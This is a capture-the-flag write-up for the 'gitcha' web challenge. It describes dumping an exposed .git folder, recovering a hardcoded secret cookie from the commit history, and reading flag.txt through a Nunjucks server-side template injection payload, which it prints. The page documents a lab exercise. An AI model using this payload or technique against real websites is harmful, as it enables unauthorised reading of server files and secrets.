🚩
CTF Writeups
  • CTF Writeups
  • CloudSEK 2023 Writeups
    • Bases
    • Serialization Saga
    • The SHA Juggler
  • Cyber Heroines CTF 2023 Writeups
    • crypto
      • Lenore Blum
      • Sophie Wilson
    • forensics
      • Barbara Liskov
      • Elizabeth Feinler
      • Margaret Hamilton
      • Marian Croak
      • Stephanie Wehner
    • pwn
      • Sally Ride
    • re
      • Anita Borg
    • web
      • Frances Allen
      • Grace Hopper
      • Radia Perlman
      • Shafrira Goldwasser
      • Susan Landau
  • DeconstruCTF 2023 Writeups
    • Gibberish
    • Hash Roll
    • MOVE
    • Magicplay
    • Missing
    • Snowy Rock
    • Space Ahoy
    • Two Paths
    • Very Basic
    • gitcha
    • sweet-nothing
    • where-are-the-cookies
    • why-are-types-weird
  • Digital Defenders CTF 2023
  • ISFCR EC CTF 2023 Writeups
    • Base the Bases
    • CrackMe
    • Device
    • Emoji Man
    • Fast Fernet
    • Hands Up
    • Hot and Cold
    • I walk alone
    • Inception
    • Lucky Guess?
    • Mess
      • chal
    • NotFooter
    • Oink Oink v2
    • Oink Oink v0
    • Oink Oink v1
    • STR
    • Seek The Treasure
    • Standard-bearer
    • Tap The Wire
    • Thomas The Train
    • What You See Is (Not) What You Get
    • Where's My Dog?
    • splitXquest
    • Zip Bomb
  • KICyber CTF 2023 Writeups
    • All Hail Hydra
    • Binary Cryptogram - Unravel the Enigma
    • Breakout - Unleash the Flag
    • Cross Platform Hunt
    • CryptoShift - Decipher the Hidden Message
    • Hidden-Network-Quest
    • MetaQuest
    • No remorse, No regret
    • OTP Portal Intrigue
    • Policy-patrol_IAM
    • Secure-Storage-Showdown
    • The-Forbidden-Telnet-Portal
    • Time Traveler's Git (Part 1)
    • Time Traveler_s Git (Part 2)
    • Time-Capsule
    • Unveiling the Hidden Message
    • Welcome to KICyber CTF
    • XORCrypt: Solitary Cipher
    • Zipper is stuck
  • Snyk Fetch The Flag 2023 Writeups
    • Back The Hawks
    • Beep64
    • Finders Keepers
    • Jott
    • Nine-One-Sixteen
    • Protecting Camp
    • Quick Maths
    • Unhackable Andy II
    • Unhackable Andy
  • YCTF Mini 2023 Writeups
    • Cat's Concert 🎧🎵
    • Death Song
    • Enigmatic Vault
    • Fire Accident
    • Military Spy
    • Movie scene
    • OSINT 1
    • OSINT 2
    • Stego Master
    • Twinkle Twinkle
    • Unchained 1
    • Unchained 2
    • Inception
  • flaws.cloud
  • YCTF-Weekly 2023
    • Week-2
      • Web
        • Cookie
        • Confluence
      • Misc
        • Never Found
Powered by GitBook
On this page
  • DESCRIPTION
  • Solution
  • Payload
  • Resources:
  1. DeconstruCTF 2023 Writeups

gitcha

DESCRIPTION

Simon is maintaining a personal portfolio website, along with a secret which no one else knows. Can you discover his secret? FLAG FORMAT: dsc{[a-zA-Z0-9_]+}

Solution

  • On viewing the page source, we see a HTML comment about .git folder

  • We are able to access the .git folder and view its contents

  • Using git-dumper download the .git folder.

  • Check the commits git log

  • commit dcfb8e6db1b5d4bc80ab7af385fd6a80a7ce9561

app.get("/supersecret", (req, res) => {
-  if (req.cookies["SECRET_COOKIE_VALUE"] === "thisisahugesecret") {
-    res.send("You found the secret!");
}})

  • To be an admin we should simply set this as the cookie: SECRET_COOKIE_VALUE:thisisahugesecret

  • access /supersecret

  • First thought was SSTI

  • Testing with basic payload {{7*7}} evaluated to 49, so our payload worked

  • Next was to retrieve contents of flag.txt

  • Found a payload on HackTrickz

Payload

{{range.constructor("return global.process.mainModule.require('fs').readFileSync('flag.txt')")()}}

  • Adding this is a note and viewing the note gives us the flag

  • Flag: dsc{g1t_enum3r4ti0n_4nD_sSt1}

Resources:

  • https://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine

  • https://github.com/geeknik/the-nuclei-templates/blob/main/node-nunjucks-ssti.yaml

  • hacktricks.xyz

Last updated 1 year ago